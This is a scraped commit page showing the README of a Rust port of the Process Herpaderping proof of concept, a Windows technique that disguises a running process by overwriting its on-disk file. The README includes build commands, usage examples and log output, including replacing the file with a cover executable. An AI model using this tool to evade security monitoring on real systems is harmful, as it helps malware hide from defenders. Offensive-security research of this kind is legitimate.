crash.software
Projects
Pull Requests
Issues
Builds
rust-herpaderping
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY rust-herpaderping Commits d8314afb
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    README.md
    1  -# rust-herpaderping
    2  -Rust implementation of the Process Herpaderping
     1 +# Rust Process Herpaderping
     2 +Rust implementation of the Process Herpaderping original PoC written by **@jxy-s**: https://github.com/jxy-s/herpaderping.
     3 + 
     4 +> **DISCLAIMER.** All information contained in this repository is provided for educational and research purposes only. The owner is not responsible for any illegal use of included code snippets.
     5 + 
     6 +## Build
     7 +```
     8 +PS C:\Users\secur30nly> cargo build --release
     9 + 
     10 +// OR
     11 + 
     12 +PS C:\Users\secur30nly> cargo build --release --features debug // debug mod enabled
     13 +```
     14 + 
     15 +## Usage
     16 +### Help menu
     17 + 
     18 +```
     19 +PS C:\Users\secur30nly> .\rust-herpaderping.exe --help
     20 +Usage: rust-herpaderping.exe <SOURCE_FILENAME> <TARGET_FILENAME> [COVER_FILENAME]
     21 + 
     22 +Arguments:
     23 + <SOURCE_FILENAME>
     24 + <TARGET_FILENAME>
     25 + [COVER_FILENAME]
     26 + 
     27 +Options:
     28 + -h, --help Print help
     29 + -V, --version Print version
     30 + 
     31 +```
     32 + 
     33 +### Process herpaderping without debug mode and replacing target file (filling with pattern)
     34 + 
     35 +```
     36 +PS C:\Users\secur30nly> .\rust-herpaderping-nodebug.exe "C:\Windows\System32\cmd.exe" "C:\temp\dummy_file.exe"
     37 +2023-06-06T10:18:03.033Z INFO [rust_herpaderping] Source File: C:\Windows\System32\cmd.exe
     38 +2023-06-06T10:18:03.034Z INFO [rust_herpaderping] Target File: C:\temp\dummy_file.exe
     39 +2023-06-06T10:18:03.034Z INFO [rust_herpaderping] Target file created, handles to source file and target file retrieved
     40 +2023-06-06T10:18:03.037Z INFO [rust_herpaderping] Source file written to target file
     41 +2023-06-06T10:18:03.038Z INFO [rust_herpaderping] Target process created
     42 +2023-06-06T10:18:03.038Z INFO [rust_herpaderping] Target file was replaced by pattern
     43 +2023-06-06T10:18:03.040Z INFO [rust_herpaderping] Main thread in target process started. Waiting until the process is finished
     44 +2023-06-06T10:18:15.322Z INFO [rust_herpaderping] Process herpaderping is over :D
     45 +```
     46 + 
     47 +### Process herpaderping with debug mode enabled
     48 + 
     49 +```
     50 +PS C:\Users\secur30nly> .\rust-herpaderping.exe "C:\Windows\System32\cmd.exe" "C:\temp\dummy_file.exe"
     51 +2023-06-06T10:19:30.079Z INFO [rust_herpaderping] Source File: C:\Windows\System32\cmd.exe
     52 +2023-06-06T10:19:30.079Z INFO [rust_herpaderping] Target File: C:\temp\dummy_file.exe
     53 +2023-06-06T10:19:30.079Z DEBUG [rust_herpaderping] Source file handle: 156
     54 +2023-06-06T10:19:30.079Z DEBUG [rust_herpaderping] Target file handle: 160
     55 +2023-06-06T10:19:30.079Z INFO [rust_herpaderping] Target file created, handles to source file and target file retrieved
     56 +2023-06-06T10:19:30.079Z DEBUG [rust_herpaderping] Source file size: 289792
     57 +2023-06-06T10:19:30.079Z DEBUG [rust_herpaderping] Target file size before writing: 0
     58 +2023-06-06T10:19:30.079Z DEBUG [rust_herpaderping] Content buffer size after reading source file: 289792
     59 +2023-06-06T10:19:30.080Z DEBUG [rust_herpaderping::utils] Bytes written to target: 289792
     60 +2023-06-06T10:19:30.080Z INFO [rust_herpaderping] Source file written to target file
     61 +2023-06-06T10:19:30.081Z DEBUG [rust_herpaderping] Section handler: 156
     62 +2023-06-06T10:19:30.081Z DEBUG [rust_herpaderping] Process handler: 164
     63 +2023-06-06T10:19:30.081Z INFO [rust_herpaderping] Target process created
     64 +2023-06-06T10:19:30.081Z DEBUG [rust_herpaderping::utils] Mapping handle: 156
     65 +2023-06-06T10:19:30.081Z DEBUG [rust_herpaderping::utils] Mapped view address: 0x20ec9590000
     66 +2023-06-06T10:19:30.081Z DEBUG [rust_herpaderping::utils] File mapping size: 290816
     67 +2023-06-06T10:19:30.081Z DEBUG [rust_herpaderping::utils] RVA of image entry point: 0x18f50
     68 +2023-06-06T10:19:30.082Z DEBUG [rust_herpaderping::utils] Bytes written to target: 289792
     69 +2023-06-06T10:19:30.082Z INFO [rust_herpaderping] Target file was replaced by pattern
     70 +2023-06-06T10:19:30.082Z DEBUG [rust_herpaderping] PEB base address: 0x307e451000
     71 +2023-06-06T10:19:30.082Z DEBUG [rust_herpaderping::utils] Parameters maximum length + size of environment: 6528
     72 +2023-06-06T10:19:30.082Z DEBUG [rust_herpaderping::utils] Allocated memory in remote process: 0x1bc62890000
     73 +2023-06-06T10:19:30.083Z DEBUG [rust_herpaderping::utils] Param env local address: 0x20ec93ce828
     74 +2023-06-06T10:19:30.083Z DEBUG [rust_herpaderping::utils] Param env remote address: 0x1bc62890708
     75 +2023-06-06T10:19:30.083Z DEBUG [rust_herpaderping::utils] Bytes of env written to remote address: 6528
     76 +2023-06-06T10:19:30.083Z DEBUG [rust_herpaderping::utils] Bytes written of param pointer to remote params: 8
     77 +2023-06-06T10:19:30.083Z DEBUG [rust_herpaderping] Remote entry point address: 0x7ff753258f50
     78 +2023-06-06T10:19:30.084Z DEBUG [rust_herpaderping] Started thread handle: 156
     79 +2023-06-06T10:19:30.085Z INFO [rust_herpaderping] Main thread in target process started. Waiting until the process is finished
     80 +2023-06-06T10:19:44.693Z INFO [rust_herpaderping] Process herpaderping is over :D
     81 +```
     82 + 
     83 +### Process herpaderping with replacing target file
     84 + 
     85 +```
     86 +PS C:\Users\secur30nly> .\rust-herpaderping-nodebug.exe "C:\Windows\System32\cmd.exe" "C:\temp\dummy_file.exe" "C:\Program Files\Process Hacker 2\ProcessHacker.exe"
     87 +2023-06-06T10:26:27.804Z INFO [rust_herpaderping] Source File: C:\Windows\System32\cmd.exe
     88 +2023-06-06T10:26:27.804Z INFO [rust_herpaderping] Target File: C:\temp\dummy_file.exe
     89 +2023-06-06T10:26:27.805Z INFO [rust_herpaderping] Target file created, handles to source file and target file retrieved
     90 +2023-06-06T10:26:27.806Z INFO [rust_herpaderping] Source file written to target file
     91 +2023-06-06T10:26:27.807Z INFO [rust_herpaderping] Target process created
     92 +2023-06-06T10:26:27.811Z INFO [rust_herpaderping] Target file was replaced by file: C:\Program Files\Process Hacker 2\ProcessHacker.exe
     93 +2023-06-06T10:26:27.812Z INFO [rust_herpaderping] Main thread in target process started. Waiting until the process is finished
     94 +2023-06-06T10:26:46.666Z INFO [rust_herpaderping] Process herpaderping is over :D
     95 +```
    3 96   
Please wait...
Page is in error, reload to recover